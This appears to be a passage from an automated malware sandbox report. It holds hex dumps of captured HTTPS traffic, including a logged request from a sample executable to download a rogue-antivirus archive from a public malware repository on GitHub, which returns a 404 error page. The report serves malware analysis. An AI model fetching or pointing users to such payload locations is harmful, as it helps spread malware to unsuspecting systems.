                                                                                                                                                2022-09-29 12:52:03 UTC37909INData Raw: 23 4c 03 05 38 07 c1 ee 81 88 13 d9 45 96 e4 2e a9 5d c7 2a a9 ac 61 59 1f d8 3d 9a 59 d1 85 e3 93 1b 0e 80 8b c9 0e 0a aa d3 b4 9f 0f cf 8b ab 6e 6a 6b fc b2 31 5a 46 20 f6 7c 4e 36 38 2d f7 ac ce e0 73 aa fd 20 59 f8 35 29 5c c6 71 6b 5b 60 fe 8f be 29 c0 09 b3 aa 8b 94 30 1e ef c9 2e cc e2 3f b1 8b c1 d5 ec 84 45 6d c2 92 bb 46 87 20 fe bd 57 98 58 26 dc 2f 31 98 68 cb 1f ac 24 75 67 d5 47 a0 9b 23 02 37 29 a8 ef 51 4a de fe 57 29 39 05 58 3f 5c 74 c0 23 7e 2e 03 e5 15 fd e1 3e 0f 03 ad a5 6a 53 db 95 4f 77 64 35 78 7c f2 83 51 70 3c 9f 66 66 6c d3 3b 7a 3a 2c 26 0d b1 3b d8 6e da 92 78 ee b6 e6 4a f6 a3 fa 56 e7 b6 fb 6b 98 18 a6 f1 c7 98 fd 91 30 d7 11 58 72 9a 83 71 17 6e 59 4a 2d f1 e5 57 49 7a 85 b6 4c 80 0e d5 5e 07 52 09 5e ba bf b2 91 41 65 1b
                                                                                                                                                Data Ascii: #L8E.]*aY=Ynjk1ZF |N68-s Y5)\qk[`)0.?EmF WX&/1h$ugG#7)QJW)9X?\t#~.>jSOwd5x|Qp<ffl;z:,&;nxJVk0XrqnYJ-WIzL^R^Ae
                                                                                                                                                2022-09-29 12:52:03 UTC37925INData Raw: 1a d4 52 e9 3a 28 84 bc bc 9b e2 1b 69 92 20 2d 1a b1 0a 75 51 d2 18 d1 6d bf 56 38 4c 3a 84 28 92 5b 6f 42 7c 35 1f b3 c7 79 a5 ad 97 8a e0 dc 7c b9 e9 74 95 80 47 2d df 2f e1 95 13 0e 11 29 16 1b 36 ba fc 14 15 c7 21 28 75 e8 f0 47 83 97 8a fe fb 60 f4 43 72 08 65 cf bf 09 11 f2 c7 8c 8d 87 fa ee a5 d8 07 da ae f1 81 db 0f af 74 8d 52 74 e8 d3 e1 f1 3e f0 e7 7c 0f 04 e2 51 50 7e f4 7a 65 8b 58 0f 0c a5 05 43 18 75 0b 33 b8 38 ae 63 ed 59 3b 29 af 9e 57 8a 86 6f 92 4c e5 49 0e 37 49 42 c8 87 3e 99 8d 47 11 ab 24 08 24 80 2a 7c d8 f1 ee 80 fd e7 34 18 e5 d7 80 b4 16 0c fc 9b 4a e2 3a 6a 47 94 6b d7 aa d9 b6 ea cb 46 5d 51 ae d1 06 d2 45 89 b9 7c 00 35 d7 ad 3f ea 76 33 b6 03 81 72 8b cf e6 8d 59 ab e8 e3 e5 e7 de dc 16 7b 53 7f ea 8e 2c 5d e6 72 07 c8 92
                                                                                                                                                Data Ascii: R:(i -uQmV8L:([oB|5y|tG-/)6!(uG`CretRt>|QP~zeXCu38cY;)WoLI7IB>G$$*|4J:jGkF]QE|5?v3rY{S,]r
                                                                                                                                                2022-09-29 12:52:03 UTC37941INData Raw: 34 7a 70 20 01 df db 76 14 90 4d 96 e3 38 8f b3 4f 0f c0 85 77 b4 e6 08 39 a9 b5 a5 64 39 af b6 a3 d0 ce 88 d1 5f 47 a1 c7 63 32 fe ba 23 32 71 6f e9 f9 30 0e eb 9c 2e 3a 6f 9f b3 48 18 b4 ed fa 16 d6 f5 03 f6 93 62 af bb 97 18 3c 40 9f 21 1c f2 6a 8e d1 9e 7c f5 9e 08 02 c1 23 59 5e 05 a7 7f a7 a6 37 14 89 75 5f ed 40 ee 39 f1 3a de e2 9f 08 62 80 ad 59 75 88 a0 9c 95 40 16 25 6e 7b 8e b7 4e 4e 44 b5 02 c2 3c 13 55 97 ce 43 24 7a 2a 34 61 b5 a0 15 ca ca 33 5e 7d 64 90 f1 3b de 6b 5d 1b 4c 6a ba f1 0f ca 1d f4 20 2d a2 95 cd 37 fb 7a 68 1d 17 e0 ea 3e b2 91 ce db ab 2f 7e fc 54 5f 7b 52 11 f7 68 71 96 34 1f f1 c4 69 1f 84 b2 d5 b6 8e b6 5a 60 fa 82 0e 4f 7e f1 c1 50 a2 37 ed 9c fc 67 e4 92 53 03 c8 71 3b 7e ad f1 0a ab ca 57 a4 a2 c7 ce f5 91 7b 2f 70 62
                                                                                                                                                Data Ascii: 4zp vM8Ow9d9_Gc2#2qo0.:oHb<@!j|#Y^7u_@9:bYu@%n{NND<UC$z*4a3^}d;k]Lj -7zh>/~T_{Rhq4iZ`O~P7gSq;~W{/pb
                                                                                                                                                2022-09-29 12:52:03 UTC37957INData Raw: 26 29 69 bd c9 25 fb a9 4f 0f bc d4 37 68 d5 43 29 c4 a9 72 22 31 a8 9a a9 9c a3 e9 44 90 2e f7 59 9d 17 ad b5 70 23 35 1b f0 6a ad 54 9d 2f d9 78 e6 14 ad d7 e0 ea fe 19 40 3a 78 a1 e2 59 dc e8 1e f6 79 c5 8a 01 14 4f 9b 06 c9 4b 5a b1 d6 d6 ea b2 ac 43 af 4b b4 4c dc ab dd 32 ff 44 da c7 1b f6 f7 73 6e 7e be 1f 75 cc 90 fb b4 24 07 92 97 01 6f 51 67 97 45 a4 0a 17 03 76 12 ab 2e 03 21 8b 00 10 7a bf 6f 75 00 36 79 a3 aa 9f fd 16 15 e6 dc da f0 38 96 f6 49 b1 ff 83 84 e3 d8 57 01 d6 18 c0 00 11 ca c2 07 bd ff bb e1 41 24 35 d7 ef fa d3 57 46 74 e8 4e cb 69 ee dd c7 77 55 74 53 65 87 b4 5b 94 37 5c 80 87 1d fc e4 de f0 c5 a3 bb 6f c7 79 8a a1 51 a3 94 50 37 bb 41 b9 c0 73 e0 0d 7e 21 34 fc f0 c6 90 0b 79 fb e9 f5 64 2b 93 23 8a 5e 09 1e 4b e9 1b cc 18 9d
                                                                                                                                                Data Ascii: &)i%O7hC)r"1D.Yp#5jT/x@:xYyOKZCKL2Dsn~u$oQgEv.!zou6y8IWA$5WFtNiwUtSe[7\oyQP7As~!4yd+#^K
                                                                                                                                                2022-09-29 12:52:03 UTC37973INData Raw: 7c 8a 1a af 65 f3 3b 7e 79 8a 08 d9 59 01 a3 95 e0 8b 7b 10 8d 24 61 3f fa d6 4c 82 45 f4 8e 74 b1 79 5c b7 1b 8d fa 5c ec c0 a2 02 94 fc 2c 23 f7 4f 5c 15 d2 f8 df dd 03 4a 8f 9d cd 1f 23 42 a3 f4 5a 5f 00 56 10 c5 7d 7f 7a 3c 6b d2 32 60 6b 6c a4 68 a9 a5 69 a7 2a 27 09 a7 1a a8 a9 22 f2 3d 3c 86 50 93 51 d8 b5 d2 e7 ce 95 ca 1b 05 72 fc 7e 9e f6 b5 28 8f 40 95 5c 1c 91 58 29 08 ea f2 fa 67 b4 92 ea 13 b8 02 95 48 4b cd 24 e5 a8 8f 42 70 59 3e fc 26 fb a8 b8 3f 79 ca f9 dd 5b 12 b8 d7 7b 95 41 dc 73 88 a5 17 f3 5d 7c 94 92 28 8b 98 81 2f 24 0b ce 2e 6c 2f 88 d0 31 32 20 3e d5 3a e1 e9 69 81 fc f2 cb e8 10 36 72 f7 e5 6d 26 f1 62 87 4b 9e c8 56 7b c6 16 b0 c2 87 aa 91 fd 45 c1 6e 44 d8 80 5c 89 7f 40 bd 44 24 02 46 52 5a 40 d4 b4 83 3c c9 0b ce 5c 21 58
                                                                                                                                                Data Ascii: |e;~yY{$a?LEty\\,#O\J#BZ_V}z<k2`klhi*'"=<PQr~(@\X)gHK$BpY>&?y[{As]|(/$.l/12 >:i6rm&bKV{EnD\@D$FRZ@<\!X


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                68192.168.2.549769140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:52:04 UTC37976OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:52:04 UTC37976INHTTP/1.1 404 Not Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:52:04 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:52:04 UTC37977INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
                                                                                                                                                2022-09-29 12:52:04 UTC37978INData Raw: 46 31 30 46 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 3e 0a 20
                                                                                                                                                Data Ascii: F10F<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com">
                                                                                                                                                2022-09-29 12:52:04 UTC37979INData Raw: 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 0a 0a 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74
                                                                                                                                                Data Ascii: <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/asset
                                                                                                                                                2022-09-29 12:52:04 UTC37980INData Raw: 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 2d 63 64 64 38 38 66 31 34 36 62 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74
                                                                                                                                                Data Ascii: gin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-cdd88f146bf7.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.git
                                                                                                                                                2022-09-29 12:52:04 UTC37982INData Raw: 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 64 33 35 31 66 36 2d 63 31 64 36 33 64 32 33 30 62 32 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6e 76 69 72 6f 6e 6d 65 6e 74 2d 30 36 38 38 66 63 32 38 33 66 64 34 2e 6a 73
                                                                                                                                                Data Ascii: _stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-d351f6-c1d63d230b29.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-0688fc283fd4.js
                                                                                                                                                2022-09-29 12:52:04 UTC37983INData Raw: 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 74 69 6d 65 2d 65 6c 65 6d 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 33 38 63 33 36 61 35 39 37 31 38 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 65 2d 61 74 74 61 63 68 6d 65 6e 74 2d 65 6c 65 6d 65 6e
                                                                                                                                                Data Ascii: _index_js-node_modules_github_time-elements_dist_index_js-38c36a597184.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-elemen
                                                                                                                                                2022-09-29 12:52:04 UTC37984INData Raw: 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 70 61 73 74 65 2d 6d 61 72 6b 64 6f 77 6e 5f 64 69 73 74 5f 69 6e 64 65 78 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6b 6f 64 64 73 73 6f 6e 5f 74 65 78 74 61 72 65 61 2d 63 2d 35 38 36 66 37 38 2d 61 61 64 30 66 61 30 31 63 37 39 32 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20
                                                                                                                                                Data Ascii: ymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_koddsson_textarea-c-586f78-aad0fa01c792.js"></script><script crossorigin="anonymous"
                                                                                                                                                2022-09-29 12:52:04 UTC37986INData Raw: 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 68 74 2d 38 33 63 32 33 35 2d 64 62 37 39 35 39 62 35 66 66 66 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69
                                                                                                                                                Data Ascii: rossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-db7959b5fff9.js"></script><script crossori
                                                                                                                                                2022-09-29 12:52:04 UTC37987INData Raw: 65 3d 22 76 69 73 69 74 6f 72 2d 70 61 79 6c 6f 61 64 22 20 63 6f 6e 74 65 6e 74 3d 22 65 79 4a 79 5a 57 5a 6c 63 6e 4a 6c 63 69 49 36 62 6e 56 73 62 43 77 69 63 6d 56 78 64 57 56 7a 64 46 39 70 5a 43 49 36 49 6b 45 78 51 54 67 36 4d 30 49 35 4f 44 6f 79 51 55 55 79 51 6a 5a 47 4f 6a 4a 43 52 44 4a 43 52 6a 51 36 4e 6a 4d 7a 4e 54 6b 30 52 6a 51 69 4c 43 4a 32 61 58 4e 70 64 47 39 79 58 32 6c 6b 49 6a 6f 69 4d 6a 51 31 4d 44 49 7a 4d 44 59 31 4e 44 51 35 4f 54 4d 35 4e 44 67 77 4e 43 49 73 49 6e 4a 6c 5a 32 6c 76 62 6c 39 6c 5a 47 64 6c 49 6a 6f 69 5a 6e 4a 68 49 69 77 69 63 6d 56 6e 61 57 39 75 58 33 4a 6c 62 6d 52 6c 63 69 49 36 49 6d 6c 68 5a 43 4a 39 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 6e 73 69 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 3c 6d
                                                                                                                                                Data Ascii: e="visitor-payload" content="eyJyZWZlcnJlciI6bnVsbCwicmVxdWVzdF9pZCI6IkExQTg6M0I5ODoyQUUyQjZGOjJCRDJCRjQ6NjMzNTk0RjQiLCJ2aXNpdG9yX2lkIjoiMjQ1MDIzMDY1NDQ5OTM5NDgwNCIsInJlZ2lvbl9lZGdlIjoiZnJhIiwicmVnaW9uX3JlbmRlciI6ImlhZCJ9" data-turbo-transient="true" /><m
                                                                                                                                                2022-09-29 12:52:04 UTC37988INData Raw: 20 20 20 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 69 74 48 75 62 20 69 73 20 77 68 65 72 65 20 70 65 6f 70 6c 65 20 62 75 69 6c 64 20 73 6f 66 74 77 61 72 65 2e 20 4d 6f 72 65 20 74 68 61 6e 20 38 33 20 6d 69 6c 6c 69 6f 6e 20 70 65 6f 70 6c 65 20 75 73 65 20 47 69 74 48 75 62 20 74 6f 20 64 69 73 63 6f 76 65 72 2c 20 66 6f 72 6b 2c 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 65 20 74 6f 20 6f 76 65 72 20 32 30 30 20 6d 69 6c 6c 69 6f 6e 20 70 72 6f 6a 65 63 74 73 2e 22 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 65 61 72 63 68 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 70 65 6e 73 65 61 72 63 68 64 65 73 63 72 69 70 74 69 6f 6e 2b 78 6d
                                                                                                                                                Data Ascii: <meta name="description" content="GitHub is where people build software. More than 83 million people use GitHub to discover, fork, and contribute to over 200 million projects."> <link rel="search" type="application/opensearchdescription+xm
                                                                                                                                                2022-09-29 12:52:04 UTC37990INData Raw: 61 67 65 3a 77 69 64 74 68 22 20 63 6f 6e 74 65 6e 74 3d 22 31 32 30 30 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 68 65 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 36 32 30 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6d 6f 64 75 6c 65 73 2f 6f 70 65 6e 5f 67 72 61 70 68 2f 67 69 74 68 75 62 2d 6f 63 74 6f 63 61 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6d 61 67 65 2f 70 6e
                                                                                                                                                Data Ascii: age:width" content="1200"> <meta property="og:image:height" content="620"> <meta property="og:image" content="https://github.githubassets.com/images/modules/open_graph/github-octocat.png"> <meta property="og:image:type" content="image/pn
                                                                                                                                                2022-09-29 12:52:04 UTC37991INData Raw: 66 65 61 74 75 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 43 54 49 4f 4e 53 5f 52 55 4e 5f 4e 41 4d 45 2c 49 4d 41 47 45 5f 4d 45 54 52 49 43 5f 54 52 41 43 4b 49 4e 47 2c 47 45 4f 4a 53 4f 4e 5f 41 5a 55 52 45 5f 4d 41 50 53 2c 53 54 52 49 43 54 5f 44 45 46 45 52 52 45 44 5f 44 49 46 46 5f 4c 49 4e 45 53 5f 43 48 45 43 4b 53 2c 53 54 52 49 43 54 5f 44 45 46 45 52 52 45 44 5f 44 49 46 46 5f 4c 49 4e 45 53 5f 43 48 45 43 4b 53 5f 52 45 50 4f 52 54 49 4e 47 22 3e 0a 0a 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 70 6a 61 78 2d 76 65 72 73 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 65 31 31 35 62 32 35 39 65 66 37 62 35 39 64 36 37 33 38 35 64 62 38 33 35 61 33 65 61 34 36 61 31 65 65 31 34 61 63 38 30 32 66 31 35 65 30 30 63 38 61
                                                                                                                                                Data Ascii: features" content="ACTIONS_RUN_NAME,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS,STRICT_DEFERRED_DIFF_LINES_CHECKS,STRICT_DEFERRED_DIFF_LINES_CHECKS_REPORTING"> <meta http-equiv="x-pjax-version" content="e115b259ef7b59d67385db835a3ea46a1ee14ac802f15e00c8a
                                                                                                                                                2022-09-29 12:52:04 UTC37992INData Raw: 74 65 2f 62 72 6f 77 73 65 72 2f 65 72 72 6f 72 73 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 62 72 6f 77 73 65 72 2d 6f 70 74 69 6d 69 7a 65 6c 79 2d 63 6c 69 65 6e 74 2d 65 72 72 6f 72 73 2d 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 5f 70 72 69 76 61 74 65 2f 62 72 6f 77 73 65 72 2f 6f 70 74 69 6d 69 7a 65 6c 79 5f 63 6c 69 65 6e 74 2f 65 72 72 6f 72 73 22 3e 0a 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 70 69 6e 6e 65 64 2d 6f 63 74 6f 63 61 74 2e 73 76 67 22 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 0a 20 20 3c 6c 69 6e
                                                                                                                                                Data Ascii: te/browser/errors"> <meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <lin
                                                                                                                                                2022-09-29 12:52:04 UTC37994INData Raw: 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6d 6f 74 65 2d 66 6f 72 6d 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 2d 39 34 66 64 36 37 2d 30 61 32 37 35 63 37 30 62 63 64 37 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22
                                                                                                                                                Data Ascii: type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-0a275c70bcd7.js"></script><script crossorigin="anonymous" defer="defer" type="
